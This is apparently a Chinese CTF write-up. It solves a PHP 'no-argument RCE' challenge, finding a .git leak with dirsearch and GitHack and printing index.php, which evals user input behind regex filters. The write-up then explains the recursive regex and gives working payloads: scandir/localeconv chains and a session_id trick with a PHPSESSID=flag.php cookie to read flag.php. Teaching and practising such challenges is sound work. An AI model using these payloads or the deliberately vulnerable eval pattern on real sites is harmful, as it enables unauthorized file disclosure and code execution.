目录
信息收集
知识讲解
涉及函数
PHP的正则表达式
无参rce
用到的函数
思路分析
方法一
方法二
信息收集
拿到这道题,抓包看了看,啥也没有,用dirsearch爆破目录发现.git目录,猜测存在.git源码泄露,用githack探测发现有index.php这个文件,原来是./git源码泄露
githack探测后拿到index.php
源码如下
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
知识讲解
涉及函数
PHP中preg_match(/{1\2\3...}/i,{})
preg_match 函数用于执行一个正则表达式匹配
/u 表示按unicode(utf-8)匹配(主要针对多字节比如汉字)
/i 表示不区分大小写(如果表达式里面有a,那么A也是匹配对象)
/s 表示将字符串视为单行来匹配
PHP preg_replace() 函数
preg_replace 函数执行一个正则表达式的搜索和替换。
PHP的正则表达式
无参rce
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); }
这段代码的核心就是只允许函数而不允许函数中的参数,就是说传进去的值是一个字符串接一个
()
,那么这个字符串就会被替换为空,如果替换后只剩下;
,那么这段代码就会被eval
执行。而且因为这个正则表达式是递归调用的,所以说像a(b(c()));
第一次匹配后就还剩下
a(b());
,第二次匹配后就还剩a();
,第三次匹配后就还剩;
了,所以说这一串a(b(c())),
就会被eval
执行,但相反,像a(b('111'));
这种存在参数的就不行,因为无论正则匹配多少次它的参数总是存在的。那假如遇到这种情况,我们就只能使用没有参数的php函数
这里如果觉得比较抽象我们可以本地搭建个匹配进行验证分析,如下
<?php
$a = 'b(a_());';
if (';' === preg_replace('/[a-z,_]+\((?R)?\)/',NULL,$a))
echo 'ok';
highlight_file(__FILE__);
?>
当a_存在参数时echo不执行,另外由于没有匹配数字,出现数字也会不执行,如'b(a1_());'
用到的函数
localeconv() 返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值
scandir() 可以扫描当前目录下的文件
array_reverse() 以相反的元素顺序返回数组
next() 将内部指针指向数组的下一个元素,并返回结果current(localeconv())永远都是个点
思路分析
方法一
先读取当前的目录
?exp=print_r(scandir(current(localeconv())));
发现一个flag.php
目录取反
?exp=print_r(array_reverse(scandir(current(localeconv()))));
指向下一个元素
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
读取文件
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
方法二
session_id()实现任意文件读取
session_id可以获取PHPSESSID的值,而我们知道PHPSESSID允许字母和数字出现,而flag.php符合条件
因此我们在请求包中cookie:PHPSESSID=flag.php,使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。
session_id()可以获取到当前的session id。
这样可以构造payload:?exp=readfile(session_id(session_start()));
达到任意文件读取的效果
先用cookie传参来设置session_id的值,session_id的值等于cookie中PHPSESSID的值,所以构建cookie头
Cookie: PHPSESSID=flag.php
在PHP中,session通常不会手动开启,需要利用php函数session_start来开启,所以可以构造payload
?exp=show_source(session_id(session_start()));